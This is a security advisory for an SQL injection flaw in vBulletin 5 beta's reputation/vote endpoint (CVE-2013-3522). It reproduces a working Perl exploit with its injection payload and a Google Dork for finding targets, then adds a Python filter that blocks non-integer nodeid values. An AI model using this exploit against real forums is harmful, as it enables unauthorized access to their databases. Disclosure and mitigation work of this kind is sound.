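vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection Vulnerability

Source: Orestis Kourides      Published: 2013-02-15 16:30:00

vBulletin is a powerful, flexible forum software suite that can be fully customized to your own needs.

vBulletin's index.php/ajax/api/reputation/vote script does not properly filter the value of the 'nodeid' parameter, which allows an attacker to inject into or manipulate SQL queries against the back-end database.

CVE-ID: 2013-3522

Affected systems:

VBulletin VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

Test method: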

Warning: The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";

if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}

$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;

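Solution:

Vendor patch:

VBulletin
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: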

http://www.vbulletin.com/
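
With no vendor patch listed, one interim control is a request filter in front of the forum that rejects any call to the vote endpoint whose nodeid is not a plain integer. The following is an added example, not part of the original advisory and not vBulletin code; it assumes a legitimate nodeid is a decimal integer, and the function name and sample hosts are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint named in the advisory, matched as a suffix since the forum's base path varies.
VOTE_SUFFIX = "/index.php/ajax/api/reputation/vote"
# Assumption: a legitimate nodeid is a plain ASCII decimal integer ([0-9], not \d).
NODEID_RE = re.compile(r"[0-9]{1,10}")


def check_vote_request(method, url, body):
    """Return (allowed, reason); body is the raw urlencoded POST body."""
    parts = urlsplit(url)
    if not parts.path.rstrip("/").lower().endswith(VOTE_SUFFIX):
        return True, "not the vote endpoint"
    # The filter cannot know where the application reads nodeid from, so check both.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        pairs += parse_qsl(body, keep_blank_values=True)
    if any(k.startswith("nodeid[") for k, _ in pairs):
        return False, "nodeid sent as an array"
    values = [v for k, v in pairs if k == "nodeid"]
    if not values:
        return False, "nodeid missing"
    if len(values) > 1:
        return False, "nodeid supplied more than once"
    if not NODEID_RE.fullmatch(values[0]):
        return False, "nodeid is not a plain integer"
    return True, "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "http://forum.example/index.php/ajax/api/reputation/vote", "nodeid=1234"),
    ("POST", "http://forum.example/vb/index.php/ajax/api/reputation/vote",
     "nodeid=1234%29+AND+%281338%3D1338"),
    ("POST", "http://forum.example/index.php/ajax/api/reputation/vote",
     "nodeid=1&nodeid=2"),
    ("POST", "http://forum.example/index.php/ajax/api/reputation/vote?nodeid=7%27", ""),
    ("GET", "http://forum.example/index.php", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, body, "->", check_vote_request(method, url, body))
```

The same allow-list rule (digits only, exactly one value) can be expressed in a WAF or reverse-proxy rule; rejected requests are worth logging, since a non-numeric nodeid on this endpoint has no legitimate use under the stated assumption.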

References:

http://www.osvdb.org/92031